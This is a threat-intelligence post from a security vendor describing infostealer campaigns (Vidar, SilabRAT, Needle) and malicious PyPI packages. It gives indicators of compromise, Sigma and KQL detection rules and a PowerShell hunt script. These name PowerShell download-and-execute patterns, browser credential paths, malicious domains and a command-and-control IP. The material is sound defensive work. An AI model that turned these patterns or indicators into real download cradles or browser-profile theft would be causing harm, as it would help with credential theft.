Back to Intelligence

Vidar, SilabRAT & Needle C2: Multi-Vector Credential Theft Campaigns Targeting Devs and End Users

SA
Security Arsenal Team
June 12, 2026
6 min read

Recent OTX Pulse data indicates a convergence of credential theft tactics, utilizing social engineering, Malware-as-a-Service (MaaS), and software supply chain compromises. Threat actors, specifically Storm-3075 and o1oo1, are actively deploying infostealers like Vidar, Lumma, and the new SilabRAT to harvest credentials, cryptocurrency wallets, and browser session data.

The attack chains are diverse:

  1. Social Engineering: Impersonating AI brands (ChatGPT, Copilot) and distributing fake software tutorials via TikTok/Instagram to trick users into running PowerShell scripts that drop Vidar.
  2. Supply Chain: Compromising PyPI and npm repositories (packages: Hades, Mini Shai-Hulud, Miasma) to target developers and bioinformatics sectors via malicious .wheels.
  3. MaaS Proliferation: SilabRAT and Needle C2 are being sold on the dark web, offering advanced features like HVNC (Hidden Virtual Network Computing) and browser extension spoofing to bypass MFA.

The primary objective across all pulses is financial fraud via credential harvesting and cryptocurrency theft, facilitated by session hijacking and browser profile cloning.

Threat Actor / Malware Profile

Malware Families

  • Vidar Stealer & Lumma Stealer: Distributed via "Hijack Loader" and social engineering lures (AI hype, TikTok tutorials). They focus on stealing cryptocurrency wallets, browser cookies, and 2FA credentials. Payloads are often downloaded via PowerShell commands executed by the victim.
  • SilabRAT (Author: o1oo1): A $5,000/month MaaS offering. It features HVNC for invisible remote control and browser profile cloning (e.g., stealing Firefox/Chrome profiles) to bypass session protections. It uses HijackLoader and AsmCrypt for obfuscation.
  • Needle (ThreatNeedle/RustyStealer): A modular crypto-stealing platform. It employs a browser extension spoofer (targeting MetaMask, Phantom) and a Rust-based desktop agent impersonating Exodus/Ledger. Notably, it left hardcoded C2 keys in the malware binary.
  • Hades / Miasma / Mini Shai-Hulud: Worms targeting developers via malicious PyPI packages. They use trojanized native .abi3.so extensions and executable .pth hooks to achieve persistence upon Python import.

Distribution Methods

  • Phishing & Malvertising: SEO poisoning and fake ads for AI tools.
  • Social Media: TikTok and Instagram Reels hosting fake "software unlock" tutorials.
  • Supply Chain: Typosquatting and package confusion attacks on Python (PyPI) and Node.js (npm) registries.

IOC Analysis

The provided indicators include:

  • Domains: brokeapt.com, msget.run, d4ug.site (Used in Vidar distribution).
  • IP Addresses: 91.199.163.124 (SilabRAT C2).
  • File Hashes (SHA1/SHA256): Multiple hashes associated with loaders, RATs, and malicious python wheels.

Operational Guidance: SOC teams should immediately block the listed domains and IPs at the perimeter firewall and proxy. The file hashes should be uploaded to EDR solutions for alerting on execution. The presence of PowerShell processes spawning from unsigned binaries (common in the TikTok Vidar campaign) should trigger high-severity alerts.

Detection Engineering

Sigma Rules

YAML
title: Potential Vidar Stealer PowerShell Execution
description: Detects PowerShell commands often used in Vidar distribution campaigns via social media tutorials, such as downloading payloads from suspicious TLDs like .run or .site.
references:
  - https://otx.alienvault.com/pulse/6666b96a774f67622155207a
author: Security Arsenal
date: 2026/06/13
modified: 2026/06/13
tags:
  - attack.execution
  - attack.t1059.001
status: experimental
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadString'
      - 'IEX'
  selection_tlds:
    CommandLine|contains:
      - '.run'
      - '.site'
      - '.xyz'
  condition: selection and selection_tlds
falsepositives:
  - Legitimate system administration scripts
level: high
---
title: SilabRAT Browser Profile Cloning Activity
description: Detects suspicious processes copying browser profile data (User Data or profile folders) which is indicative of SilabRAT or other infostealers performing session hijacking.
references:
  - https://otx.alienvault.com/pulse/66683c91774f676221552338
author: Security Arsenal
date: 2026/06/13
tags:
  - attack.collection
  - attack.t1005
status: experimental
logsource:
  product: windows
  category: file_access
detection:
  selection:
    TargetFilename|contains:
      - '\AppData\Local\Google\Chrome\User Data'
      - '\AppData\Local\Mozilla\Firefox\Profiles'
      - '\AppData\Roaming\Opera Software\Opera Stable'
  filter_legit:
    Image|endswith:
      - '\chrome.exe'
      - '\firefox.exe'
      - '\opera.exe'
  condition: selection and not filter_legit
falsepositives:
  - Backup software
  - Browser migration tools
level: high
---
title: Malicious PyPI Package Import Execution
description: Detects the import of known malicious Python package names associated with the Hades, Mini Shai-Hulud, and Miasma campaigns targeting bioinformatics developers.
references:
  - https://otx.alienvault.com/pulse/6667219d774f676221552119
author: Security Arsenal
date: 2026/06/13
tags:
  - attack.initial_access
  - attack.t1195.002
status: experimental
logsource:
  product: linux
  category: process_creation
detection:
  selection:
    Image|endswith: '/python'
    CommandLine|contains:
      - 'import minishaihulud'
      - 'import miasma'
      - 'import hadesbio'
  condition: selection
falsepositives:
  - Legitimate development testing (unlikely unless intentionally using malicious names)
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for suspicious PowerShell download activity referencing Vidar IOCs
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("Invoke-WebRequest", "DownloadString", "IEX", "msget.run", "d4ug.site")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| extend IoCMatch = "PowerShell Suspicious Download"

// Hunt for network connections to SilabRAT C2 IP
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP == "91.199.163.124"
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName
| extend IoCMatch = "SilabRAT C2 Connection"

PowerShell Hunt Script

PowerShell
# IOC Hunt for Vidar and SilabRAT Artifacts
# Requires Admin Privileges

Write-Host "[+] Hunting for Vidar/SilabRAT artifacts..." -ForegroundColor Cyan

# Check Hosts File for Malicious Domains
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
$MaliciousDomains = @("brokeapt.com", "msget.run", "d4ug.site", "rongtv.xyz", "ssffaa19.xyz")

if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($domain in $MaliciousDomains) {
        if ($HostsContent -match $domain) {
            Write-Host "[!] ALERT: Malicious domain found in hosts file: $domain" -ForegroundColor Red
        }
    }
}

# Check for Suspicious Scheduled Tasks (Common Loader Persistence)
$SuspiciousPatterns = @("HijackLoader", "Vidar", "SilabRAT", "Update-*")
Get-ScheduledTask | Where-Object { 
    $_.TaskName -match "Update" -or 
    $_.Actions.Execute -match "powershell" -and 
    $_.Actions.Arguments -match "http"
} | ForEach-Object {
    Write-Host "[!] Suspicious Scheduled Task found: $($_.TaskName)" -ForegroundColor Yellow
    Write-Host "    Action: $($_.Actions.Execute) $($_.Actions.Arguments)" -ForegroundColor Gray
}

# Check Active Connections for SilabRAT IP
netstat -ano | Select-String "91.199.163.124" | ForEach-Object {
    Write-Host "[!] ALERT: Active connection to SilabRAT C2 detected!" -ForegroundColor Red
    Write-Host "    $_" -ForegroundColor Gray
}

Write-Host "[+] Hunt complete."

Response Priorities

  • Immediate: Block all IOCs (IPs 91.199.163.124, domains brokeapt.com, msget.run, d4ug.site) at the perimeter. Isolate endpoints showing PowerShell command lines matching the TikTok tutorial patterns.
  • 24h: Conduct credential resets and session invalidation for users in high-risk sectors (Technology, Finance) who may have been exposed to the Vidar or SilabRAT campaigns, particularly those with crypto-wallet access.
  • 1 Week: Audit all Python and npm package dependencies in development environments. Implement application control to prevent unauthorized PowerShell execution from non-admin scripts. Roll out security awareness training focused on AI-themed phishing and "too good to be true" software cracks on social media.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsvidar-stealersilabratsupply-chain-attackinfostealercredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action